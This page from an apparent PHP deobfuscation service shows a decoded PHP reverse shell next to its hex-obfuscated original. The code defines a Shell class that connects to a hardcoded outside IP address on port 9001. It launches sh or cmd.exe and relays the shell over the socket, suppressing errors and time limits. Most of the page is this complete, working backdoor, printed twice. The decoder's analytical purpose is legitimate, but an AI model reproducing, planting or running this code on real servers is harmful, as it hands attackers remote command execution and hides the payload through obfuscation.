Find this useful? Enter your email to receive occasional updates for securing PHP code.

Signing you up...

Thank you for signing up!

PHP Decode

<?php goto A9Zsn; XgH6P: $sh = new Shell("\x31\x30\x38\56\x31\67\56\71\64\x2e\x32", 90..

Decoded Output download

<?php 
 goto A9Zsn; 
 XgH6P: $sh = new Shell("108.17.94.2", 9001); 
 goto GyPJ5; 
 A9Zsn: class Shell { private $addr = null; 
 private $port = null; 
 private $os = null; 
 private $shell = null; 
 private $descriptorspec = array(0 => array("pipe", "r"), 1 => array("pipe", "w"), 2 => array("pipe", "w")); 
 private $buffer = 1024; 
 private $clen = 0; 
 private $error = false; 
 public function __construct($addr, $port) { $this->addr = $addr; 
 $this->port = $port; 
 } private function detect() { $detected = true; 
 if (stripos(PHP_OS, "LINUX") !== false) { $this->os = "LINUX"; 
 $this->shell = "sh"; 
 } else { if (stripos(PHP_OS, "WIN32") !== false || stripos(PHP_OS, "WINNT") !== false || stripos(PHP_OS, "WINDOWS") !== false) { $this->os = "WINDOWS"; 
 $this->shell = "cmd.exe"; 
 } else { $detected = false; 
 } } return $detected; 
 } private function daemonize() { $exit = false; 
 if ($pid > 0) { $exit = true; 
 } return $exit; 
 } private function settings() { @error_reporting(0); 
 @set_time_limit(0); 
 @umask(0); 
 } private function dump($data) { $data = str_replace("<", "&lt;", $data); 
 $data = str_replace(">", "&gt;", $data); 
 } private function read($stream, $name, $buffer) { if (($data = @fread($stream, $buffer)) === false) { $this->error = true; 
 } return $data; 
 } private function write($stream, $name, $data) { if (($bytes = @fwrite($stream, $data)) === false) { $this->error = true; 
 } return $bytes; 
 } private function rw($input, $output, $iname, $oname) { while (($data = $this->read($input, $iname, $this->buffer)) && $this->write($output, $oname, $data)) { if ($this->os === "WINDOWS" && $oname === "STDIN") { $this->clen += strlen($data); 
 } $this->dump($data); 
 } } private function brw($input, $output, $iname, $oname) { $fstat = fstat($input); 
 $size = $fstat["size"]; 
 if ($this->os === "WINDOWS" && $iname === "STDOUT" && $this->clen) { while ($this->clen > 0 && ($bytes = $this->clen >= $this->buffer ? $this->buffer : $this->clen) && $this->read($input, $iname, $bytes)) { $this->clen -= $bytes; 
 $size -= $bytes; 
 } } while ($size > 0 && ($bytes = $size >= $this->buffer ? $this->buffer : $size) && ($data = $this->read($input, $iname, $bytes)) && $this->write($output, $oname, $data)) { $size -= $bytes; 
 $this->dump($data); 
 } } public function run() { if ($this->detect() && !$this->daemonize()) { $this->settings(); 
 $socket = @fsockopen($this->addr, $this->port, $errno, $errstr, 30); 
 if ($socket) { stream_set_blocking($socket, false); 
 $process = @proc_open($this->shell, $this->descriptorspec, $pipes, null, null); 
 if ($process) { foreach ($pipes as $pipe) { stream_set_blocking($pipe, false); 
 } $status = proc_get_status($process); 
 @fwrite($socket, "SOCKET: Shell has connected! PID: " . $status["pid"] . "
"); 
 do { $status = proc_get_status($process); 
 if (feof($socket)) { break; 
 } else { if (feof($pipes[1]) || !$status["running"]) { break; 
 } } $streams = array("read" => array($socket, $pipes[1], $pipes[2]), "write" => null, "except" => null); 
 $num_changed_streams = @stream_select($streams["read"], $streams["write"], $streams["except"], 0); 
 if ($num_changed_streams === false) { break; 
 } else { if ($num_changed_streams > 0) { if ($this->os === "LINUX") { if (in_array($socket, $streams["read"])) { $this->rw($socket, $pipes[0], "SOCKET", "STDIN"); 
 } if (in_array($pipes[2], $streams["read"])) { $this->rw($pipes[2], $socket, "STDERR", "SOCKET"); 
 } if (in_array($pipes[1], $streams["read"])) { $this->rw($pipes[1], $socket, "STDOUT", "SOCKET"); 
 } } else { if ($this->os === "WINDOWS") { if (in_array($socket, $streams["read"])) { $this->rw($socket, $pipes[0], "SOCKET", "STDIN"); 
 } if (($fstat = fstat($pipes[2])) && $fstat["size"]) { $this->brw($pipes[2], $socket, "STDERR", "SOCKET"); 
 } if (($fstat = fstat($pipes[1])) && $fstat["size"]) { $this->brw($pipes[1], $socket, "STDOUT", "SOCKET"); 
 } } } } } } while (!$this->error); 
 foreach ($pipes as $pipe) { fclose($pipe); 
 } proc_close($process); 
 } fclose($socket); 
 } } } } goto XgH6P; 
 GyPJ5: $sh->run(); 
 goto ysT75; 
 ysT75: unset($sh); 
 goto Mc7qU; 
 Mc7qU: ?>

Did this file decode correctly?

Original Code

<?php
 goto A9Zsn;
 XgH6P: $sh = new Shell("\x31\x30\x38\56\x31\67\56\71\64\x2e\x32", 9001);
 goto GyPJ5;
 A9Zsn: class Shell { private $addr = null;
 private $port = null;
 private $os = null;
 private $shell = null;
 private $descriptorspec = array(0 => array("\x70\151\x70\x65", "\162"), 1 => array("\160\151\160\145", "\167"), 2 => array("\x70\151\x70\x65", "\x77"));
 private $buffer = 1024;
 private $clen = 0;
 private $error = false;
 public function __construct($addr, $port) { $this->addr = $addr;
 $this->port = $port;
 } private function detect() { $detected = true;
 if (stripos(PHP_OS, "\x4c\x49\x4e\125\130") !== false) { $this->os = "\x4c\111\x4e\125\x58";
 $this->shell = "\163\x68";
 } else { if (stripos(PHP_OS, "\127\111\116\63\62") !== false || stripos(PHP_OS, "\127\111\116\x4e\x54") !== false || stripos(PHP_OS, "\127\111\x4e\x44\117\x57\123") !== false) { $this->os = "\x57\x49\116\x44\x4f\127\123";
 $this->shell = "\143\155\x64\56\x65\x78\x65";
 } else { $detected = false;
 } } return $detected;
 } private function daemonize() { $exit = false;
 if ($pid > 0) { $exit = true;
 } return $exit;
 } private function settings() { @error_reporting(0);
 @set_time_limit(0);
 @umask(0);
 } private function dump($data) { $data = str_replace("\x3c", "\46\154\164\x3b", $data);
 $data = str_replace("\x3e", "\x26\x67\164\73", $data);
 } private function read($stream, $name, $buffer) { if (($data = @fread($stream, $buffer)) === false) { $this->error = true;
 } return $data;
 } private function write($stream, $name, $data) { if (($bytes = @fwrite($stream, $data)) === false) { $this->error = true;
 } return $bytes;
 } private function rw($input, $output, $iname, $oname) { while (($data = $this->read($input, $iname, $this->buffer)) && $this->write($output, $oname, $data)) { if ($this->os === "\x57\111\116\104\x4f\127\123" && $oname === "\123\x54\x44\x49\116") { $this->clen += strlen($data);
 } $this->dump($data);
 } } private function brw($input, $output, $iname, $oname) { $fstat = fstat($input);
 $size = $fstat["\163\x69\x7a\145"];
 if ($this->os === "\x57\x49\x4e\104\x4f\127\x53" && $iname === "\x53\124\x44\x4f\x55\124" && $this->clen) { while ($this->clen > 0 && ($bytes = $this->clen >= $this->buffer ? $this->buffer : $this->clen) && $this->read($input, $iname, $bytes)) { $this->clen -= $bytes;
 $size -= $bytes;
 } } while ($size > 0 && ($bytes = $size >= $this->buffer ? $this->buffer : $size) && ($data = $this->read($input, $iname, $bytes)) && $this->write($output, $oname, $data)) { $size -= $bytes;
 $this->dump($data);
 } } public function run() { if ($this->detect() && !$this->daemonize()) { $this->settings();
 $socket = @fsockopen($this->addr, $this->port, $errno, $errstr, 30);
 if ($socket) { stream_set_blocking($socket, false);
 $process = @proc_open($this->shell, $this->descriptorspec, $pipes, null, null);
 if ($process) { foreach ($pipes as $pipe) { stream_set_blocking($pipe, false);
 } $status = proc_get_status($process);
 @fwrite($socket, "\x53\117\103\x4b\105\124\x3a\x20\x53\150\x65\154\154\40\150\141\x73\40\143\x6f\156\156\x65\143\x74\145\144\x21\x20\120\x49\104\72\x20" . $status["\x70\x69\144"] . "\12");
 do { $status = proc_get_status($process);
 if (feof($socket)) { break;
 } else { if (feof($pipes[1]) || !$status["\x72\165\x6e\x6e\151\156\147"]) { break;
 } } $streams = array("\162\x65\141\x64" => array($socket, $pipes[1], $pipes[2]), "\x77\162\x69\164\x65" => null, "\x65\x78\x63\145\160\x74" => null);
 $num_changed_streams = @stream_select($streams["\x72\x65\x61\x64"], $streams["\167\162\x69\164\145"], $streams["\x65\x78\143\145\x70\x74"], 0);
 if ($num_changed_streams === false) { break;
 } else { if ($num_changed_streams > 0) { if ($this->os === "\x4c\x49\116\x55\x58") { if (in_array($socket, $streams["\x72\145\x61\x64"])) { $this->rw($socket, $pipes[0], "\x53\x4f\103\113\105\124", "\x53\x54\104\111\x4e");
 } if (in_array($pipes[2], $streams["\162\145\141\144"])) { $this->rw($pipes[2], $socket, "\123\x54\104\105\x52\x52", "\x53\x4f\x43\113\x45\124");
 } if (in_array($pipes[1], $streams["\x72\145\x61\x64"])) { $this->rw($pipes[1], $socket, "\x53\124\x44\x4f\x55\x54", "\123\117\103\x4b\105\x54");
 } } else { if ($this->os === "\127\x49\116\x44\x4f\x57\123") { if (in_array($socket, $streams["\x72\x65\141\144"])) { $this->rw($socket, $pipes[0], "\x53\x4f\x43\x4b\x45\x54", "\123\124\x44\x49\x4e");
 } if (($fstat = fstat($pipes[2])) && $fstat["\x73\x69\x7a\145"]) { $this->brw($pipes[2], $socket, "\x53\x54\x44\105\122\122", "\x53\117\103\x4b\105\124");
 } if (($fstat = fstat($pipes[1])) && $fstat["\x73\x69\x7a\x65"]) { $this->brw($pipes[1], $socket, "\123\x54\104\x4f\x55\x54", "\x53\117\x43\113\105\x54");
 } } } } } } while (!$this->error);
 foreach ($pipes as $pipe) { fclose($pipe);
 } proc_close($process);
 } fclose($socket);
 } } } } goto XgH6P;
 GyPJ5: $sh->run();
 goto ysT75;
 ysT75: unset($sh);
 goto Mc7qU;
 Mc7qU: ?>

Function Calls

None

Variables

None

Stats

MD5 a7c1b06ab06134cedafd7311d5dd859d
Eval Count 0
Decode Time 54 ms